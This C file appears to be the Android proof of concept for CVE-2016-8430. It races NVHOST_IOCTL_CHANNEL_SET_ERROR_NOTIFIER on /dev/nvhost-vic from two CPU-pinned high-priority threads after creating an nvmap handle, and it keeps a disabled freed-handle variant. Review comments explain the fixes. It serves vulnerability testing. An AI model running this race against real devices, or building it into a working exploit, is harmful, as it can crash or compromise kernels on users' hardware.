      1 /*
      2  * Copyright (C) 2016 The Android Open Source Project
      3  *
      4  * Licensed under the Apache License, Version 2.0 (the "License");
      5  * you may not use this file except in compliance with the License.
      6  * You may obtain a copy of the License at
      7  *
      8  *      http://www.apache.org/licenses/LICENSE-2.0
      9  *
     10  * Unless required by applicable law or agreed to in writing, software
     11  * distributed under the License is distributed on an "AS IS" BASIS,
     12  * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
     13  * See the License for the specific language governing permissions and
     14  * limitations under the License.
     15  */
#define _GNU_SOURCE	/* Linux-only extensions used below (gettid, affinity, ...) */

#include <dirent.h>
#include <dlfcn.h>
#include <errno.h>
#include <fcntl.h>
#include <linux/types.h>	/* __s32/__u32/__u64 used by the ioctl structs below */
#include <pthread.h>
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/time.h>
#include <unistd.h>

     37 
/*
 * nvhost channel ioctl ABI, presumably copied from the NVIDIA kernel driver's
 * UAPI header. These structs are handed to ioctl() as-is, so field order,
 * width and padding must match the driver exactly: do not retype them (e.g.
 * to uint32_t) or reorder them.
 */
struct nvhost_channel_open_args {
	__s32 channel_fd;	/* filled in by the driver; trigger_channel_open() pre-sets it to -1 and reads it back */
};
/*
 * Argument of NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER. In this PoC only
 * `offset` (always 0) and `mem` (an nvmap handle) are written, by
 * prepare_data(); `size` and `padding` keep the zero from static
 * initialisation of g_error_notifier.
 */
struct nvhost_set_error_notifier {
	__u64 offset;	/* offset into `mem`; only 0 is used here */
	__u64 size;	/* never set by this PoC; stays 0 */
	__u32 mem;	/* nvmap handle (g_nvmap_hdl.handle) */
	__u32 padding;
};
#define NVHOST_IOCTL_MAGIC 'H'
/* Returns a channel fd in channel_fd; issued on the /dev/nvhost-vic fd. */
#define NVHOST_IOCTL_CHANNEL_OPEN	\
	_IOR(NVHOST_IOCTL_MAGIC,  112, struct nvhost_channel_open_args)
/*
 * The ioctl this PoC races: two CPU-pinned threads issue it in a tight loop
 * on the same /dev/nvhost-vic fd (g_fd, not a channel fd) with the same
 * g_error_notifier argument (see race_thread / trigger_set_error_notifier).
 */
#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER  \
	_IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
/*
 * nvmap ioctl ABI, presumably copied from the NVIDIA kernel driver's UAPI
 * header. Same caveat as the nvhost structs above: these go straight to
 * ioctl(), so keep the layouts byte-for-byte.
 */
/* NVMAP_IOC_CREATE argument. Which union member is meaningful depends on the
 * request; this PoC only sets `size` (0x1000, see trigger_nvmap_create) and
 * reads `handle` back. */
struct nvmap_create_handle {
	union {
		__u32 id;	/* FromId */
		__u32 size;	/* CreateHandle */
		__s32 fd;	/* DmaBufFd or FromFd */
	};
	__u32 handle;		/* returns nvmap handle */
};
/* NVMAP_IOC_ALLOC argument. trigger_nvmap_alloc() fills it with the GENERIC
 * carveout, the ZEROED_PAGES flag and a 0x1000 alignment. */
struct nvmap_alloc_handle {
	__u32 handle;		/* nvmap handle */
	__u32 heap_mask;	/* heaps to allocate from */
	__u32 flags;		/* wb/wc/uc/iwb etc. */
	__u32 align;		/* min alignment necessary */
};
/* heap_mask bits. Only NVMAP_HEAP_CARVEOUT_GENERIC is used in this file. */
#define NVMAP_HEAP_CARVEOUT_IRAM    (1ul<<29)
#define NVMAP_HEAP_CARVEOUT_VPR     (1ul<<28)
#define NVMAP_HEAP_CARVEOUT_TSEC    (1ul<<27)
#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)

/* NOTE(review): NVMAP_HEAP_IOVMM is not defined anywhere in this file, so
 * this macro cannot be expanded. It is unused here, which is the only reason
 * it does not break the build; either define NVMAP_HEAP_IOVMM next to the
 * other heap bits or drop this macro. */
#define NVMAP_HEAP_CARVEOUT_MASK    (NVMAP_HEAP_IOVMM - 1)

/* allocation flags (struct nvmap_alloc_handle.flags) */
/* The low two bits select the cache mode; NVMAP_HANDLE_CACHE_FLAG masks them. */
#define NVMAP_HANDLE_UNCACHEABLE     (0x0ul << 0)
#define NVMAP_HANDLE_WRITE_COMBINE   (0x1ul << 0)
#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
#define NVMAP_HANDLE_CACHEABLE       (0x3ul << 0)
#define NVMAP_HANDLE_CACHE_FLAG      (0x3ul << 0)

#define NVMAP_HANDLE_SECURE          (0x1ul << 2)
#define NVMAP_HANDLE_KIND_SPECIFIED  (0x1ul << 3)
#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
#define NVMAP_HANDLE_ZEROED_PAGES    (0x1ul << 5)	/* the only flag this PoC passes */
#define NVMAP_HANDLE_PHYS_CONTIG     (0x1ul << 6)
#define NVMAP_HANDLE_CACHE_SYNC      (0x1ul << 7)
#define NVMAP_IOC_MAGIC 'N'

/* NVMAP_IOC_CREATE creates a new memory handle: on input the union holds the
 * requested size, on return `handle` holds the new handle.
 * NVMAP_IOC_ALLOC backs an existing handle with memory per heap_mask/flags/align.
 * NVMAP_IOC_FREE is an _IO() request: the handle is passed directly as the
 * ioctl argument word, not through a pointer (see trigger_nvmap_free).
 */
 #define NVMAP_IOC_ALLOC    _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
#define NVMAP_IOC_CREATE  _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
#define NVMAP_IOC_FREE       _IO(NVMAP_IOC_MAGIC, 4)
/* Device fds, opened by open_driver(); -1 until then. */
int g_fd = -1;		/* /dev/nvhost-vic: target of every nvhost ioctl in this file */
int g_nvmap_fd = -1;	/* /dev/nvmap: handle create/alloc/free */
/* Start line for the race threads: each blocks on `cond` under `mutex` until
 * main() broadcasts. There is no predicate variable, so the wait relies on
 * main()'s 100 ms delay to get both threads parked before the broadcast. */
static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
int g_channel_fd = -1;	/* written by trigger_channel_open(), which main() never calls */
/* Argument of the racing SET_ERROR_NOTIFIER ioctls. prepare_data() sets
 * offset and mem; size and padding stay zero from static initialisation. */
struct nvhost_set_error_notifier g_error_notifier;
/* CREATE argument/result: size in, handle out (trigger_nvmap_create). */
struct nvmap_create_handle g_nvmap_hdl;

/* ALLOC argument, filled by trigger_nvmap_alloc(). The explicit {0} is
 * redundant for a file-scope object but harmless. */
struct nvmap_alloc_handle g_real_alloc = {0};
    103 
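/*
 * Open the two device nodes the PoC needs: /dev/nvhost-vic (the ioctl target
 * of the race, stored in g_fd) and /dev/nvmap (handle create/alloc/free,
 * stored in g_nvmap_fd). Both are opened O_RDONLY, as in the original.
 *
 * Returns 1 when both opens succeed, -1 otherwise. On failure neither global
 * is left half-initialised: if the first open succeeded but the second
 * failed, the first fd is closed again and both globals are reset to -1, so a
 * caller that ignores the return value cannot issue ioctls on a partially
 * set-up pair (the original leaked the nvhost fd in that case).
 *
 * errno is captured before printing because printf() may clobber it.
 */
int open_driver() {
    const char *dev_path = "/dev/nvhost-vic";
    g_fd = open(dev_path, O_RDONLY);
    if (g_fd < 0) {
        int err = errno;
        printf("open file(%s) failed, errno=%d\n", dev_path, err);
        return -1;
    }
    printf("open file(%s) succ!\n", dev_path);

    dev_path = "/dev/nvmap";
    g_nvmap_fd = open(dev_path, O_RDONLY);
    if (g_nvmap_fd < 0) {
        int err = errno;
        printf("open file(%s) failed, errno=%d\n", dev_path, err);
        /* Do not leak the nvhost fd when the second open fails. */
        close(g_fd);
        g_fd = -1;
        return -1;
    }
    printf("open file(%s) succ!\n", dev_path);
    return 1;
}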
    124 
/*
 * Issue NVHOST_IOCTL_CHANNEL_OPEN on the nvhost-vic fd and record the channel
 * fd the driver returns in g_channel_fd. The out-field is pre-set to -1 so a
 * failed ioctl (its return value is not checked) leaves g_channel_fd at -1.
 *
 * Not called from main() in this file: the race is run against g_fd directly,
 * not against a channel fd.
 */
void trigger_channel_open() {
    struct nvhost_channel_open_args open_args;
    open_args.channel_fd = -1;
    (void)ioctl(g_fd, NVHOST_IOCTL_CHANNEL_OPEN, &open_args);
    g_channel_fd = open_args.channel_fd;
}
    130 
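/*
 * Create a 0x1000-byte nvmap handle via NVMAP_IOC_CREATE, using the global
 * g_nvmap_hdl as the in/out argument (prepare_data() later reads the handle
 * from there).
 *
 * Returns the new handle, or 0 if the ioctl failed. The out-field is cleared
 * before the call so that a failure cannot hand back a stale handle left in
 * the global by an earlier call (the original returned whatever was there).
 */
int trigger_nvmap_create() {
    g_nvmap_hdl.size = 0x1000;
    g_nvmap_hdl.handle = 0;
    if (ioctl(g_nvmap_fd, NVMAP_IOC_CREATE, &g_nvmap_hdl) < 0) {
        int err = errno;   /* capture before printf() can clobber it */
        printf("NVMAP_IOC_CREATE failed, errno=%d\n", err);
        return 0;
    }
    return g_nvmap_hdl.handle;
}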
    136 
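/*
 * Release the nvmap handle held in g_nvmap_hdl via NVMAP_IOC_FREE.
 *
 * NVMAP_IOC_FREE is an _IO() request, so the handle travels in the ioctl
 * argument word itself rather than through a pointer. The argument is
 * widened to unsigned long before the variadic call: the original passed an
 * int, which the C library reads back as a pointer-sized value (formally
 * undefined, and the ABI does not guarantee the upper 32 bits of a narrower
 * argument). Failures are reported but not fatal.
 *
 * The handle value is deliberately left in g_nvmap_hdl afterwards; main()
 * keeps this call commented out right before the race, which looks like the
 * "race against a freed handle" variant of the experiment — confirm before
 * relying on it. Callers must not treat g_nvmap_hdl.handle as valid after
 * this returns.
 */
void trigger_nvmap_free() {
    unsigned long handle = g_nvmap_hdl.handle;
    if (ioctl(g_nvmap_fd, NVMAP_IOC_FREE, handle) < 0) {
        int err = errno;
        printf("NVMAP_IOC_FREE failed, errno=%d\n", err);
    }
}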
/*
 * Back `handle` with memory via NVMAP_IOC_ALLOC: the generic carveout heap,
 * zeroed pages, 0x1000-byte alignment. The request is staged in the global
 * g_real_alloc (every field of it is rewritten here) and the ioctl result is
 * not checked, matching the original.
 */
void trigger_nvmap_alloc(int handle) {
    g_real_alloc = (struct nvmap_alloc_handle){
        .handle    = handle,
        .heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC,
        .flags     = NVMAP_HANDLE_ZEROED_PAGES,
        .align     = 0x1000,
    };
    (void)ioctl(g_nvmap_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
}
/*
 * Fill the SET_ERROR_NOTIFIER argument used by the race threads: the notifier
 * lives at offset 0 of the nvmap handle created earlier. `size` and `padding`
 * are not written here and keep whatever g_error_notifier already holds
 * (zero from static initialisation).
 */
void prepare_data() {
    struct nvhost_set_error_notifier *notifier = &g_error_notifier;
    notifier->mem = g_nvmap_hdl.handle;
    notifier->offset = 0;
}
    152 
/*
 * One iteration of the race: send NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER
 * with the shared g_error_notifier to the /dev/nvhost-vic fd (g_fd, not a
 * channel fd). The result is intentionally ignored; both race threads call
 * this back-to-back forever.
 */
void trigger_set_error_notifier() {
    int rc = ioctl(g_fd, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &g_error_notifier);
    (void)rc;
}
    156 
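/*
 * Pin the calling thread to the CPUs in `cpu_mask` (bit i selects CPU i) and
 * set its nice value to `privi`. The race threads use this to sit on two
 * different CPUs at nice -19 so both hit the driver at full speed.
 *
 * Failures are reported on stderr but are not fatal: the PoC still runs,
 * just with worse timing. Lowering nice below the current value needs
 * CAP_SYS_NICE or a matching RLIMIT_NICE, so an unprivileged run will
 * normally log the setpriority failure for the -19 callers.
 *
 * Fixes vs. the original: errors were swallowed by an empty if-body, and
 * `&cpu_mask` (an unsigned long *) was passed to the libc sched_setaffinity()
 * prototype, which takes a cpu_set_t * (a constraint violation that newer
 * compilers reject). The kernel interface takes a bit array of the
 * caller-supplied length, which is exactly what the unsigned long is, so the
 * raw syscall is used to keep that calling convention without the
 * pointer-type mismatch. The thread id is obtained via syscall() too, since
 * older C libraries (glibc < 2.30) have no gettid() wrapper.
 */
void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
    pid_t tid = (pid_t)syscall(SYS_gettid);

    /* Linux: PRIO_PROCESS with a thread id applies to that thread only. */
    if (setpriority(PRIO_PROCESS, tid, privi) < 0) {
        int err = errno;
        fprintf(stderr, "setpriority(%d) failed, errno=%d\n", privi, err);
    }

    if (syscall(SYS_sched_setaffinity, tid, sizeof(cpu_mask), &cpu_mask) < 0) {
        int err = errno;
        fprintf(stderr, "sched_setaffinity(0x%lx) failed, errno=%d\n", cpu_mask, err);
    }
}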
    164 
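/* Set by main() under `mutex` once the nvmap handle and notifier argument are
 * ready. The race threads wait on this predicate, so a broadcast that fires
 * before a thread has reached pthread_cond_wait() is no longer lost (the
 * original had no predicate and relied on main()'s 100 ms sleep alone; a
 * lost wakeup would have left a thread parked forever and the race silently
 * not running). */
static int g_race_started = 0;

/*
 * Body shared by both race threads: pin to `cpu_mask` at nice -19, wait for
 * main()'s start signal, then issue NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER
 * in a tight loop for the rest of the process lifetime. Two of these on
 * different CPUs are what drive the same ioctl concurrently on g_fd.
 */
static void *race_on_cpu(unsigned long cpu_mask) {
    setup_privi_and_affinity(-19, cpu_mask);

    pthread_mutex_lock(&mutex);
    while (!g_race_started) {
        pthread_cond_wait(&cond, &mutex);
    }
    pthread_mutex_unlock(&mutex);

    for (;;) {
        trigger_set_error_notifier();
    }
    return NULL;   /* not reached; threads end when the process exits */
}

/* Race thread pinned to CPU 1 (mask 2). */
void* race_thread(void* arg) {
    (void)arg;
    return race_on_cpu(2);
}

/* Race thread pinned to CPU 0 (mask 1). */
void* race_thread_2(void* arg) {
    (void)arg;
    return race_on_cpu(1);
}

/*
 * PoC driver (this file lives under CVE-2016-8430): open the devices, create
 * and back one nvmap handle, point an error notifier at it, then let two
 * CPU-pinned threads hammer SET_ERROR_NOTIFIER concurrently for 100 s.
 * The race targets the kernel driver, so a vulnerable device may crash or
 * misbehave; run it only on a test device.
 *
 * Returns 0 after the race window, -1 if the devices or threads could not be
 * set up. Thread creation failures are now fatal: with a single thread there
 * is no race and the run would pass vacuously.
 */
int main(int argc, char**argv) {
    (void)argc;
    (void)argv;

    setup_privi_and_affinity(0, 1);
    if (open_driver() < 0) {
        return -1;
    }

    /* One nvmap handle backed by a 0x1000-byte zeroed allocation; its handle
     * becomes the notifier's `mem`. */
    trigger_nvmap_alloc(trigger_nvmap_create());
    prepare_data();
    /* Experiment variant kept from the original (disabled): calling
     * trigger_nvmap_free() here would run the race against an already freed
     * handle. */

    pthread_t tid;
    int rc = pthread_create(&tid, NULL, race_thread, NULL);
    if (rc == 0) {
        rc = pthread_create(&tid, NULL, race_thread_2, NULL);
    }
    if (rc != 0) {
        fprintf(stderr, "pthread_create failed, rc=%d\n", rc);
        return -1;
    }

    /* Kept from the original so the start timing is unchanged; with the
     * predicate above it is no longer needed for correctness. */
    usleep(100 * 1000);

    pthread_mutex_lock(&mutex);
    g_race_started = 1;
    pthread_cond_broadcast(&cond);
    pthread_mutex_unlock(&mutex);

    /* Race window. The threads are never joined; process exit ends them. */
    sleep(100);
    return 0;
}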
    205